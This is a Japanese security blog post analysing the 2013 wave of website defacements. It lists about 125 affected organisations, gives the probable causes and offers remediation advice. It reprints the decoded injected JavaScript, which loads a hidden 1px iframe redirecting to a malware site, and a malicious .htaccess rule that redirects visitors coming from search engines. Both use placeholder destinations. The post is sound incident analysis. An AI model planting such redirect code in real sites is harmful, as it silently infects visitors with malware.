piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

5月から多発しているHP改ざんインシデントをまとめてみた。

概要

5月に入ってから複数の組織でホームページの改ざんが発生していると報じられています。この件に直接関連しているかは不明ですが、IPA警察庁トレンドマイクロもホームページの改ざんに関して注意喚起や情報を掲載しています。IPAは2008年に猛威を振るったGumblarによるものや2012年9月18日前後に多発したHP改ざんの規模に匹敵すると発表しています。ここでは5月以降発生している改ざんインシデントについてついてまとめます。

改ざんの概要イメージ

現時点で判明している情報、及びそこから推測される内容を踏まえて一連の流れを図にしました。(改ざんが行われるまでの流れは推測部分が多く含まれます。)

 

改ざんされる内容

複数の方の報告によればWebサーバー上に配置されている次の拡張子のファイルの全部、または一部に対して、第三者による改ざんが行われています。改ざん方法にはいくつかの種類があり、確認されているものの多くは共通して「0c0896」等の文字列が埋め込まれています。改ざんサイトを閲覧した際、悪性サイトへリダイレクトをさせ、そこでマルウェア(以下のese_adminさんのBlogによればFakeAV系)に感染させることを目的としているように見受けられるものの、wakatonoさんが分析されているように書き換えはできたものの埋め込みをしたJavaScriptが動作しない(いわゆる毒入れに失敗したかの)ようなケースもあるようです。*1

今回の改ざんについて調査・考察されている方の記事

尚、JPCERT/CCは埋め込まれる固定文字列が16進数6桁であることから一連の改ざんを「コードネーム COLOR」と呼称して調査しているようです。

静的コンテンツへの改ざん

静的コンテンツへの改ざんは難読化されたJavaScript(数字の羅列の様な文字列)が埋め込まれます。トレンドマイクロによりJS_BLACOLE.SMTTとして検知される実体は埋め込まれたJavaScriptです。実際に実行されるのは次のようなコードです。変数名等、一部は改ざん先によって異なる場合があるようです。悪性サイトへリダイレクトする1pxのIFRAMEが埋め込まれることになります。

function zzzfff()
{
	var egefi = document.createElement('iframe');
	egefi.src = 'http://(リダイレクト先悪性サイトURL)';
	egefi.style.position = 'absolute';
	egefi.style.border = '0';
	egefi.style.height = '1px';
	egefi.style.width = '1px';
	egefi.style.left = '1px';
	egefi.style.top = '1px';
	if (!document.getElementById('egefi'))
	{
		document.write('<div id=\'egefi\'></div>');
		document.getElementById('egefi').appendChild(egefi);
	}
}

function SetCookie(cookieName,cookieValue,nDays,path)
{
	var today = new Date();
	var expire = new Date();
	if (nDays==null || nDays==0) nDays=1;
	expire.setTime(today.getTime() + 3600000*24*nDays);
	document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie( name )
{
	var start = document.cookie.indexOf( name + "=" );
	var len = start + name.length + 1;
	if ( ( !start ) &&
	( name != document.cookie.substring( 0, name.length ) ) )
	{
		return null;
	}
	if ( start == -1 ) return null;
	var end = document.cookie.indexOf( ";", len );
	if ( end == -1 ) end = document.cookie.length;
	return unescape( document.cookie.substring( len, end ) );
}

if (navigator.cookieEnabled)
{
	if(GetCookie('visited_uq')==55){}
	else
	{
		SetCookie('visited_uq', '55', '1', '/');
		zzzfff();
	}
}
分散設定ファイルへの改ざん

MASAKIさんより.htaccessの改ざんに関する情報を頂きました。検索やポータルサイト等からこの.htaccessが改ざんされたサイトを訪れた場合に悪性サイトへリダイレクトさせるものと思われます。

#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://転送先URL [R=301,L]
</IfModule>

#/0c0896#

 

改ざんされた原因

現在進行形で起きているためか、改ざん原因について詳細を公表している組織はあまり多くありませんが、改ざん原因を発表している組織がいくつかあり、以下に抜粋します。

  • 情報ネットワーク法学会

改ざんは、管理者アカウントを何らかの方法で入手してFTPあるいはSSHにより外部から実行されたものと判断しており

http://in-law.jp/
  • 神奈川県保険医協会

本サイトの管理・運営委託会社のパソコンを経由して、サイト用サーバーに不正アクセスがあり、改ざんされるという被害を受けました

http://www.hoken-i.co.jp/outline/cat272/post_102.html

当院がホームページのコンテンツ管理(CMS)を委託している企業側のパソコンがコンピュータウイルスに感染した事が原因でした。

http://www.h.u-tokyo.ac.jp/oshirase/archives/20130604.html

また、IPAJPCERT/CCの注意喚起によるとFTPSSHアカウント情報を窃取するウィルスの存在に触れられています。

“パソコンのJavaのバージョンが古いままだったためにFTPアカウント情報を漏えいさせるウイルスに感染した”というウイルス感染のケース※もありました。

http://www.ipa.go.jp/security/txt/2013/06outline.html

また、攻撃に使用されている一部のマルウエアには、FTP/SSH クライアントや Web ブラウザなどに保存されている過去に入力したアカウント情報などを窃取する機能を有しているものがあり、Web コンテンツ更新に使用されるアカウント情報がマルウエアにより窃取されている可能性があります。

http://www.jpcert.or.jp/at/2013/at130027.html

さらにこの件に関連していると思われる質問がYahoo知恵袋に投稿されています。この被害を受けた方はFTPサーバーを使っていたようです。

これらから、今回多発している改ざんは、Gumblarのようなマルウェア、あるいは情報を窃取するマルウェアを通じて管理用ID、パスワードが盗まれた*2ことが原因で改ざんされたのではないかと考えられます。他には「サーバーやソフトウェアの脆弱性が放置されていた」、「単純なID、パスワードを使っていた」、「そもそも認証等必要なく誰でも更新できる状況だった」も原因として考えられるでしょう。
 

改ざんを受けた場合の対策

改ざん被害を受けたサイトはID、パスワードの変更だけにとどまるのではなく、次の点に対応漏れがないか確認してください。

  • Webサイト管理用のアプリケーション(CMSや管理ソフト)が最新の状態かどうか
  • Webサイトのメンテナンスは管理端末のみに接続が制限されているか
  • 管理端末でウィルス対策ソフトによるスキャンが行われているか
  • サーバー、管理端末のOS、ウィルス対策ソフト、ドキュメントソフト等がすべて最新の状態か

また今回の事例ではトップページではなく、その配下のWebページが改ざんされているケースも見受けられることから、改ざんされた事実に気づいていない可能性もあり、FTPログや管理するコンテンツに差分が発生していないかも確認したほうが良いでしょう。

 

改ざんされていたことを報告したWebサイト一覧

5月以降、ホームページが改ざんされたことを公表しているサイトを以下に掲載します。全ての組織がこのように公表することはないと考えられるため、これらサイトも多発している改ざんの一部だと思われます。また以下のリストは「HPが改ざん」されたことを共通点としているだけであり、これら一連の改ざんが関連したものであるかは不明です。

No 改ざんされたサイト URL 改ざん期間*3 改ざん原因 改ざん内容 掲載文
1 鹿児島県教職員互助組合 kyogo.or.jp 05/01 2:45〜05/02 13:32 掲載無 ウィルスに感染する可能性 *4
2 アウンコンサルティング株式会社 www.auncon.co.jp 05/01〜05/07 サーバーへの不正アクセス ウィルスに感染する可能性
HEUR:Trojan.Script.Generic
*5
3 削除要請があっため削除
4 世界人権問題研究センター www.mmjp.or.jp/jinken 05/21〜05/28午後 デンマークからの不正アクセス ウィルスに感染する可能性 *6 *7
5 有限会社APCブレーン APCブレーン及び所属アーティスト含む関連ページ
www.apc-brain.co.jp
レディバード
www.apc-brain.co.jp/ladybird
05/22 19:37〜05:26 1:27 掲載無 ウィルスに感染する可能性
Trojan:JS/Rediredtor.MB
*8
6 日本産業廃棄物処理振興センター www.jwnet.or.jp/whatsnew/index.php
www.jwnet.or.jp/oshirase/index.php
www.jwnet.or.jp/workshop/index.php
掲載無(修正は05/17) 掲載無 ウィルスに感染する可能性
TROJ_FAKEAV亜種
*9
7 リコージャパン プリントアウトファクトリー
www.printout.jp
05/25 7時頃〜05/31 22時半頃 掲載無 ウィルスに感染する可能性
トロイの木馬マルウェア
*10
8 株式会社ディーバ www.diva.co.jp 05/25 15:50〜05/29 15:10 三者不正アクセス ウィルスに感染する可能性 *11
9 科学技術振興機構 crds.jst.go.jp/5th/
crds.jst.go.jp/about_sympo/
crds.jst.go.jp/access/
crds.jst.go.jp/GIES/
crds.jst.go.jp/daily/
05/25〜05/27 10時頃
2013/06/01〜2013/06/03 11時55分
掲載無 悪性サイトへ誘導される可能性 *12
10 三重交通グループホールディングス株式会社 観光販売システムズホームページ
kanko-pro.co.jp
トライパルツアー
sanq-tripal.com
熊野古道シャトルバス
Kumanokodo.co.jp
みえ観光ウェブ
mie-kanko.jp
05/26 17:00〜06/01 17:00 掲載無 ウィルスに感染する可能性 *13 *14
11 横浜シティ・エア・ターミナル株式会社 YCAT
www.ycat.co.jp
05/26 23:00〜05/27 17:00 掲載無 ウィルスに感染する可能性 *15
12 神奈川県保険医協会 「いい医療.com」の一部 05/27 0:00〜14:00 PC経由による不正アクセス 悪性サイトへ誘導される可能性 *16 *17
13 美浜町 www.town.mihama.aichi.jp 05/28 13:00〜16:00 掲載無 ウィルスに感染する可能性 *18
14 田原総一郎 www.taharasoichiro.comの一部 05/28〜05/29 13時 掲載無 悪性サイトへ誘導 *19
15 株式会社アーク 京のすっぴんさん
www.suppinsan.com
05/28 15:17〜05/29 14:00 掲載無 ウィルスに感染する可能性 *20
16 ワタナベ ランド LAND et vous
landetvous.com
掲載無(掲載日付は05/29) 掲載無 ウィルスに感染する可能性 *21
17 ミツミ電機株式会社 www.mitsumi.co.jp 5/29 7:20〜13:37 3回にわたり不正アクセス ウィルスに感染する可能性 *22
18 株式会社アジュバンコスメジャパン Re:PRO
www.repro-top.com
05/29 17:00〜06/01 9:25 掲載無 ウィルスに感染する可能性
JS_Trojan.Crypt.MT
*23
19 情報ネットワーク法学会 in-law.jp配下のWebページ全て 05/29 19時〜05/30 12時 FTPあるいはSSH 悪性サイトへ誘導 *24
20 沖縄県 県立玉城青少年の家
www.okinawa-nanjo-youthhome.jp
05/29 20:00〜06/03 11:00 掲載無 文字化け
ウィルスに感染する可能性
*25
21 山梨県立塩山高等学校 塩山高校商業研究部
www.enzanh.kai.ed.jp/ENZAN business research club WEB/配下のページ
塩山高校女子ソフトボール
www.enzanh.kai.ed.jp/ENZAN softball club WEB/配下のページ
05/29〜05/30 掲載無 ウィルスに感染する可能性 *26
22 フジ印刷株式会社 WarpStyle
warpstyle.jp
05/29〜05/30 12:00 Webサーバーへの不正アクセス ウィルスに感染する可能性 *27
23 横浜市 横浜観光情報
www.welcome.city.yokohama.jp
05/30 4:00〜16:30 掲載無 書き換えられたのみ *28
24 横浜市 www.kuraki-noh.jp 05/30 10:00〜06/04 12:10 掲載無 ウィルスに感染する可能性
JS_BLACOLE.SMTT
*29 *30
25 日比谷アミューズメントプランニング らんの里 堂ヶ島
www.dogashima.com
05/30 14:16〜18:22 掲載無 ウィルスに感染する可能性
悪性サイトへ誘導される可能性
*31
26 愛知県バドミントン協会 www.badminton-aichi.comの一部 05/30 17:13〜06/01 17:30 掲載無 ウィルスに感染する可能性 *32
27 東京大学医学部付属病院 www.h.u-tokyo.ac.jp 05/30 20:00〜05/31 2:30 管理業者PC感染による改ざん ウィルスに感染する可能性 *33
28 ときめきドットコム シンニチプレミアムストア
njpw-p.jp
05/30 19時〜06/03 14時 掲載無 ウィルスに感染する可能性
JS_BLACOLE.SMTT
*34
29 姫路市まちづくり振興機構 himeji-machishin.jp 05/31 4:30〜17:00 掲載無 ウィルスに感染する可能性 *35
30 株式会社幼児教育実践研究所 こぐま会
www.kogumakai.co.jp
05/31 18:30〜06/04 10:00 掲載無 ウィルスに感染する可能性
JS_BLACOLE.SMTT
*36
31 株式会社テレワークマネジメント www.telework-management.co.jpの一部 05/31未明〜11時頃 掲載無 ウィルスに感染する可能性
JS_BLACOLE.SMTT
*37
32 ☆脱!カラオケコンプレックス www.arcadia.gr.jp 5月末〜06/04 AM 掲載無 ウィルスに感染する可能性
HEUR:Trojan.Script.Generic
*38
33 エフエム群馬 fmgunma.com配下の248ファイル 06/01 5時〜06/03 13時 外部から不正アクセス ウィルスに感染する可能性 *39 *40
34 仙台市農作物有害鳥獣対策協議会 www.inocc.jpの一部 06/01〜06/03アクセス 掲載無 ウィルスに感染する可能性 *41
35 株式会社ウェブメッセージ plaza.rakuten.co.jp/toretama/ 06/01〜06/02 掲載無 掲載無 *42
36 北海道文教大学 www.do-bunkyodai.ac.jp 掲載無(06/02に判明) 掲載無 ウィルスに感染する可能性 *43
37 神戸市立桃山台児童館 www.eonet.ne.jp/~momoyamadai/ 06/02〜06/03 掲載無 ウィルスに感染する可能性 *44
38 日本馬術連盟 www.equitation-japan.comの一部 06/04 15:47〜17:25 掲載無 掲載無 *45
39 有限会社ゆたぷろ www.yutapro.comの一部 06/04 17:00〜06/05 11:45 掲載無 ウィルスに感染する可能性
JS_BLACOLE.SMTT
*46
40 能登空港利用促進協議会 www.notohantou.net 06/05 1:00〜10:00 三者不正アクセス トップページが表示されない
ウィルスに感染する可能性
*47
41 札幌市 札幌市ワークライフ・バランス推進事業
www.sapporo-wlb.jp
改ざん時期不明〜06/05 0:10 掲載無 ウィルスに感染する可能性
JS_BLACOLE.SMTT
*48 *49
42 日本創造教育研究所 ありがとう経営のすすめ
arigatou-keiei.jp
業績アップ研修.com
gyoseki-up.com
心に残るありがとう体験談募集
arigatou-taiken.jp
朝礼.com
cho-rei.com
ありがとう卓越経営大賞
arigatou-takuetsu.jp
人事セミナー.com
yarigai-jinji.com
ありがとうブログ
arigatou-blog.com
建設みらい研究所
kensetsu-mirai.com
05/29 20:42〜05/30 11:13 掲載無 ウィルスに感染する可能性
Gumblarの亜種
*50
43 有限会社 ビブリオポリ www.bibliopoly.co.jp 掲載無 掲載無 掲載無 *51
44 株式会社アーク www.organic-skincare.jpの一部 05/28 15:17〜05/29 12:40 三者不正アクセス ウィルスに感染する可能性 *52
45 アール・ビー・コントロールズ株式会社 www.rbcontrols.co.jpのHTMLファイル全て 06/02 10:20〜06/03 10:00 三者不正アクセス ウィルスに感染する可能性
JS/Kryptik.AKY
*53
46 エスペック株式会社 Test-Navi
www.test-navi.com
06/04 17:00〜06/05 12:00 三者不正アクセス ウィルスに感染する可能性 *54
47 札幌市 ようこそさっぽろ
www.welcome.city.sapporo.jp
掲載無(06/05 9:00発覚)〜06/06 20:00 掲載無 掲載無 *55 *56
48 早稲田スポーツ新聞会 www.wasedasports.com 掲載無(06/05 22:32時点で改ざん確認) 掲載無 掲載無 *57
49 寺本法律会計事務所 teramoto-law.jp 05/31〜06/06 三者不正アクセス ウィルスに感染する可能性 *58
50 函館信用金庫 www.hakodate-shinkin.jpの一部 06/03 1:00〜06/04 9:30 三者不正アクセス ウィルスに感染する可能性 *59
51 株式会社トヨシマ www.kk-toyoshima.co.jpの一部 05/29〜06/03 三者不正アクセス ウィルスに感染する可能性 *60
52 浜松グリーンウェーブ株式会社 www.hgw.co.jpの一部 06/03 4:00〜06/06 22:00 三者不正アクセス ウィルスに感染する可能性 *61 *62
53 株式会社アーク ふじ光成堂薬局
www.sasaherusu.comの一部
05/28 15:17〜05/29 12:40 三者不正アクセス ウィルスに感染する可能性 *63
54 株式会社アーク ふじ光成堂薬局
www.organic-skincare.jpの一部
05/28 15:17〜05/29 12:40 三者不正アクセス ウィルスに感染する可能性 *64
55 上毛新聞TRサービス TRサービスホームページ
www.j-tr.jp
デリジェイホームページ
deli-j.j-tr.jp
掲載無(06/04判明) 掲載無 ウィルスに感染する可能性
JS_BLACOLE.SMTT
*65 *66
56 北恵株式会社 www.kitakei.jp 06/01 23:00〜06/04 12:00 外部委託サーバーへ不正アクセス ウィルスに感染する可能性
JS/Kryptik.ANY
*67
57 有限会社アップフィールド 日報Webシステム
np-sys.info
05/25 16:50〜05/30 00:00 掲載無 ウィルスに感染する可能性 *68
58 株式会社一幸陶苑 PRIMAG
www.pri-mug.com
掲載無 掲載無 ウィルスに感染する可能性 *69
59 株式会社エー・ティー・エックス 複数の特設ページ
www.at-x.com/html/
06/04〜06/06 20:00 三者不正アクセス ウィルスに感染する可能性 *70
60 株式会社ミノウラ www.mnr.co.jp 05/03〜05/28 三者不正アクセス ウィルスに感染する可能性 *71
61 日本デオドール株式会社 www.deodor.co.jp 05/28〜06/02 国外からの不正アクセス 掲載無 *72
62 大富士フットボールクラブ ohfuji-fc.com 05/04〜05/06 掲載無 ウィルスに感染する可能性 *73
63 鍼灸 you-sinkyu-in.com 05/28 15:31〜19:48 米国からの不正アクセス ウィルスに感染する可能性 *74
64 板橋区立成増小学校支援地域本部 narimasu.gr.jp 05/18 13:00〜22:00 三者不正アクセス ウィルスに感染する可能性 *75
65 株式会社CRAZY TV www.crazytv.com 05/29〜06/03 三者不正アクセス ウィルスに感染する可能性 *76
66 株式会社 かなえるリンク www.kanaerulink.co.jp 06/02 11:50〜06/04 18:00 三者不正アクセス ウィルスに感染する可能性 *77
66 緑秀会田無病院 www.tanashi-hospital.or.jp /06/03 1:00〜06/04 12:00 三者不正アクセス ウィルスに感染する可能性 *78
67 株式会社ドゥ・ハウス モラタメ.net
www.moratame.net
06/05 18:44〜06/07 6:30 三者不正アクセス ウィルスに感染する可能性 *79
68 札幌静修高等学校 www.sapporoseishu.ed.jp 06/02 14:00〜06/04 9:00 三者不正アクセス ウィルスに感染する可能性 *80
69 日本文化出版株式会社 NBPオンラインショッピング
shop.nbp.ne.jp
05/30 8:00〜06/06 20:00 三者不正アクセス ウィルスに感染する可能性 *81
70 海洋研究開発機構 高知コア研究所
www.kochi-core.jp
05/25〜05/29 三者不正アクセス ウィルスに感染する可能性 *82
71 ゑびすや www.ebisuyagolf.com 06/02〜06/05 15:00 三者不正アクセス ウィルスに感染する可能性 *83
72 すみだ産業会館 www.sumidasangyokaikan.jp 06/05 三者不正アクセス ウィルスに感染する可能性 *84
73 地盤工学会 電子図書室サービス
www.jgs-library.net
掲載無(06/03判明)〜06/04 三者不正アクセス ウィルスに感染する可能性 *85
74 愛知・豊川用水振興協会 aitoyo.or.jp 05/29 15:00〜06/06 18:00 三者不正アクセス ウィルスに感染する可能性 *86
75 栄信電気工業株式会社 www.eisin.co.jpの一部 05/31〜06/03 三者不正アクセス ウィルスに感染する可能性 *87
76 登録紹介宣伝あくせすくん park1.wakwak.com/~com/ 掲載無(06/01掲載) 不明 不明 *88
77 日本赤十字社 www.jrc.or.jp 05/30 20:00〜21:54 三者による改ざん ウィルスに感染する可能性 *89
78 株式会社HKS バスデポ
bus-depot.in
06/04 23:00〜06/06 12:00 三者による不正アクセス ウィルスに感染する可能性 *90
79 石川県教職員互助会 www.ishikyogo.or.jpの一部 05/31 0:00〜16:00 三者による不正アクセス ウィルスに感染する可能性 *91
80 株式会社アクア www.aqua-ltd.com 05/31 7:39〜06/05 2:46 三者による不正アクセス ウィルスに感染する可能性 *92
81 国立民族学博物館 関雄二教授個人HP
www.r.minpaku.ac.jp/sekito/
05/25〜06/06 三者による不正アクセス ウィルスに感染する可能性 *93
82 長谷川敬税理士事務所 office-hasegawa.com 05/29〜06/03 19:00 三者による不正アクセス ウィルスに感染する可能性
JS_BLACOLE.SMTT
*94
83 TokiwagiFC Fan tokiwagifcfan.com 掲載無(06/04に判明) 掲載無 ウィルスに感染する可能性 *95
84 東京こけし友の会 www.tokyo-kokeshi.jp 05/30〜06/04 掲載無 掲載無 *96
85 ΜΟΟΥΣΕΊΟΝ www.moouseion.com
www.hisaoh.com
www.letharia.com
05/28〜05/30 海外からの不正アクセス 掲載無 *97
86 松菱金属工業株式会社 www.matsubishi-kinzoku.co.jpの一部 06/01 16:40〜06/04 16:40 悪意を持った第三者からの攻撃 ウィルスに感染する可能性
JS_BLACOLE.SMTT
*98
87 日本グラフィックサービス工業会 www.jagra.or.jp 06/03 2:00〜10:00 掲載無 ウィルスに感染する可能性
トロイの木馬
(不正JavaScriptの埋め込み)
*99
88 盛岡三菱自動車販売株式会社 morioka-mitsubishi.com 06/04 18:30〜06/06 13:00 三者不正アクセス ウィルスに感染する可能性
JS_BLACOLE.SMTT
*100
89 北海道文化財 haf.jpの一部 05/30〜06/03 三者不正アクセス ウィルスに感染する可能性 *101
90 ふどうさんの現代屋 www.gendaiya.com 掲載無(06/13発表) 海外からのFTP接続 掲載無 *102
91 株式会社さうすウェーブ southwave.co.jp 06/01 0:00〜06/04 18:00 三者不正アクセス ウィルスに感染する可能性 *103
92 湘南鎌倉総合病院 shonankamakura.or.jp 06/11 6:40〜13:05 三者不正アクセス ウィルスに感染する可能性 *104
93 株式会社HASUNA www.hasuna.co.jpの一部 05/31 3:00〜06/03 8:30 掲載無 ウィルスに感染する可能性 *105
94 日本コンクリート工学会 www.jci-net.or.jp 06/02 11:00〜06/03 12:15 掲載無 ウィルスに感染する可能性 *106
95 ライオン堂 www.lion-do.jp/ 05/28〜06/06 不正アクセス ウィルスに感染する可能性 *107
96 あんしん堂 www.nsg-a.jp
www.ansindo.jp
06/03〜06/11 英仏デンマークからのFTPへの不正アクセス ウィルスに感染する可能性 *108
97 ニルフィスクアドバンス株式会社 www.nilfisk-advance.co.jpの一部 06/03〜06/07 三者不正アクセス ウィルスに感染する可能性 *109
98 ライブラリーコンテンツサービス株式会社 www.lib-con.jp 06/13 5:20〜10:30 三者不正アクセス ウィルスに感染する可能性 *110
99 ヒーリングルーム愛 healingroomai.com 06/12 05:30〜06:14 13:00 掲載無 ウィルスに感染する可能性 *111
100 トヨタ自動車株式会社 www2.toyota.co.jp/jp/news/ 06/05 18:26〜06/14 21:47 三者不正アクセス ウィルスに感染する可能性 *112
101 中小企業経営革新支援ネットワーク chusho-kakushin.netの一部 05/31〜06/06 三者不正アクセス ウィルスに感染する可能性 *113
102 DXアンテナ株式会社 www.dxantenna.co.jp 05/29 18:29〜05/30 18:38 三者不正アクセス ウィルスに感染する可能性 *114
103 新陽ビニール工業株式会社 shinyo-v.co.jp 05/28 05:00〜06/13 三者不正アクセス ウィルスに感染する可能性
JS_BLACOLE.SMTT
*115
104 情報処理学会 情報規格調査会
www.itscj.ipsj.or.jp
06/15〜06/17(詳細調査中) 掲載無 ウィルスに感染する可能性 *116
105 株式会社グローバルスズキ global-suzuki.com 05/08〜05/20 三者不正アクセス
サイト管理システムの脆弱性を突かれた可能性
ウィルスに感染する可能性 *117
106 なんぶの湯 www.nanbunoyu.jp 06/07〜06/17 サーバー上の脆弱性を突かれた可能性 ウィルスに感染する可能性 *118
107 株式会社サンコンタクトレンズ www.sun-con.comの一部 06/08〜06/13 三者不正アクセス ウィルスに感染する可能性 *119
108 ときめきドットコム株式会社 charaheroes.jp 06/14 09:55〜16:05 三者不正アクセス ウィルスに感染する可能性 *120
109 WHO's Generation www.whosgeneration.info 掲載無(06/10判明) 三者不正アクセス ウィルスに感染する可能性 *121
110 慶應義塾体育会フェンシング部 keio-fencing.main.jp 06/01〜06/03 20:13 三者不正アクセス ウィルスに感染する可能性 *122
111 ナチュラ鍼灸治療院 ameblo.jp/natural-harikyu/ 掲載無(06/18判明) 三者不正アクセス ウィルスに感染する可能性 *123
112 OliveBeauty www.olivebeauty-s.com 06/12〜06/13 三者不正アクセス ウィルスに感染する可能性 *124
113 道の駅サザンセトとうわ www.sazan-seto.com 06/10〜(06/20お詫び掲載) 三者不正アクセス ウィルスに感染する可能性 *125
114 株式会社FIT www.fitcoltd.com 06/16、06/23 三者不正アクセス ウィルスに感染する可能性 *126
115 株式会社ウチダレック www.uchidarec.comの一部 06/23 10:40〜06/24 11:00 三者不正アクセス ウィルスに感染する可能性 *127
116 榊電業株式会社 www.sakaki-elc.co.jp 06/23 05:00〜06/25 14:00 三者不正アクセス ウィルスに感染する可能性 *128
117 プラスワンリビングハウス株式会社 プラスワンリビング
www.plusoneliving.jp
プラスワンリビングハウス
plusonelivinghouse.jp
06/08 10:00〜06/13 16:00 三者不正アクセス ウィルスに感染する可能性 *129
118 東邦レオ株式会社 エコガーデン.JP
www.ecogarden.jp
まちなか菜園
www.machinaka-saien.jp
クリエイティブグリーン
www.mansion-green.jp
06/12 11:00〜06/13 16:00 三者不正アクセス ウィルスに感染する可能性 *130
119 三菱地所株式会社 空と土プロジェクト
www.soratsuchi.com内のフォーム
06/12 04:52〜06/24 14:00 三者不正アクセス ウィルスに感染する可能性 *131
120 二宮町 www.town.ninomiya.kanagawa.jp 06/23 10:00〜06/24 14:00 三者不正アクセス ウィルスに感染する可能性 *132
121 鹿児島大学共同獣医学部附属動物病院 www.kuvth.com 05/17〜05/29 三者不正アクセス ウィルスに感染する可能性 *133
122 茨城県警備業協会 ibaraki.r.ajssa.or.jp 05/28〜06/03 三者不正アクセス ウィルスに感染する可能性 *134
123 特例民法法人移行手続研究会 tokureiminpouhoujin119.com/ 05/31〜06/06 三者不正アクセス 悪性サイトへリダイレクトされる可能性 *135
124 兼進刃物製作所 kaneshin-seki.com 06/11 5:00〜06/17 10:00 三者不正アクセス ウィルスに感染する可能性 *136
125 鹿児島大学大学院臨床心理学研究科 www.leh.kagoshima-u.ac.jp/kumcp/ 05/24〜06/21 三者不正アクセス ウィルスに感染する可能性 *137

*1:検索で引っ掛かる場合の多くがこの毒入れ失敗パターンだとか。

*2:ただし相当数のサイトで改ざんされた時期が重なっており、人為的に行うのは相応の人数がいなければ難しいように思います。

*3:表記は全て2013年発生

*4:鹿児島県教職員互助組合ホームページの改ざんについて,鹿児島県教職互助組合,2013/06/06アクセス:魚拓

*5:コンピュータウイルス感染の報告とお詫び,アウンコンサルティング,2013/06/04アクセス:魚拓

*6:世界人権問題研究センターからのお知らせ,世界人権問題研究センター,2013/06/04アクセス:魚拓

*7:HPがウイルス感染 世界人権問題研究センター 京都,MSN産経,2013/06/04アクセス:魚拓

*8:当社ホームページ及び関連ページの改ざんに関するお詫びとご報告,APCブレーン,2013/06/04アクセス

*9:当センターホームページの改ざんに関するお詫び,日本産業廃棄物処理振興センター,2013/06/04アクセス:魚拓

*10:「プリントアウトファクトリー」サイト改ざんに関するお知らせ,リコージャパン,2013/06/04アクセス:魚拓

*11:不正アクセスによるサイト改ざんについて,ディーバ,2013/06/06アクセス:魚拓

*12:ホームページ改ざんに関するお知らせとお詫び,科学技術振興機構,2013/06/04アクセス:魚拓

*13:(PDF)当社のグループ会社におけるWEBサイト改ざんについてのお詫び,三重交通グループホールディングス,2013/06/06アクセス

*14:(PDF)当社のグループ会社におけるWEBサイト改ざんについての追加情報,三重交通グループホールディングス,2013/06/06アクセス

*15:ホームページ改ざんに関するお知らせとお詫び,横浜シティ・エア・ターミナル,2013/06/06アクセス:魚拓

*16:神奈川県保険医協会ホームページ「いい医療.com」の改ざん発生について,神奈川県保険医協会,2013/06/04アクセス:魚拓

*17:(重要)本ウェブサイトの復旧のお知らせとお願い,神奈川県保険医協会,2013/06/04/アクセス:魚拓

*18:美浜町ホームページを閲覧された皆様へ、ホームページ改ざんに関するお詫び,美浜町,2013/06/04アクセス:魚拓

*19:ホームページ改ざんに関するお知らせとお詫び,田原総一郎,2013/06/04アクセス:魚拓

*20:ホームページ改ざんに関するお知らせとお詫び,アーク,2013/06/04アクセス:魚拓

*21:【Night on the Planet および LAND et vous より重要なお知らせ】,ワタナベランド,2013/06/04アクセス:魚拓

*22:<重要なお知らせ>不正アクセスによる障害のお知らせとウィルスチェックのお願い,ミツミ電機,2013/06/04アクセス:魚拓

*23:(PDF)当社ホームページの改ざんに関するお詫びとご報告,アジュバンコスメジャパン,2013/06/06アクセス

*24:ウェブサイト改ざんのご報告とお詫び,情報ネットワーク法学会,2013/06/04アクセス:魚拓

*25:【重要】県立玉城青少年の家ホームページ改ざんについて,沖縄県,2013/06/06アクセス:魚拓

*26:本校ウェブサイトへの不正アクセスについて,山崎県立塩山高等学校,2013/06/04アクセス:魚拓

*27:当Webサイト改ざんに関する報告とお詫び,フジ印刷,2013/06/06アクセス:魚拓

*28:ウェブサイト改ざんのご報告とお詫び,横浜市,2013/06/06アクセス:魚拓

*29:久良岐 お詫び,シグマコミュニケーションズ,2013/06/05アクセス:魚拓

*30:久良岐能舞台公式ホームページをご利用の皆様へホームページ再開に際してのご挨拶,シグマコミュニケーションズ,2013/06/15アクセス:魚拓

*31:らんの里堂ヶ島ホームページに関するお詫びとお知らせ,日比谷アミューズメントプランニング,2013/06/04アクセス:魚拓

*32:公式サイト改ざんに関するお詫びとご報告,愛知県バドミントン協会,2013/06/05アクセス:魚拓

*33:当院ホームページの不正な改変事案に関する注意喚起とお詫びとお願い,東京大学医学部付属病院,2013/06/05アクセス:魚拓

*34:シンニチプレミアムストアご利用のお客様へ改ざんに関するお詫びとお知らせ,ときめきドットコム,2013/06/04アクセス:魚拓

*35:当機構ホームページの改ざんについて,姫路市まちづくり振興機構,2013/06/04アクセス:魚拓

*36:「当サイトの改ざんに関するお詫び」,幼児教育実践研究所,2013/06/06アクセス:魚拓

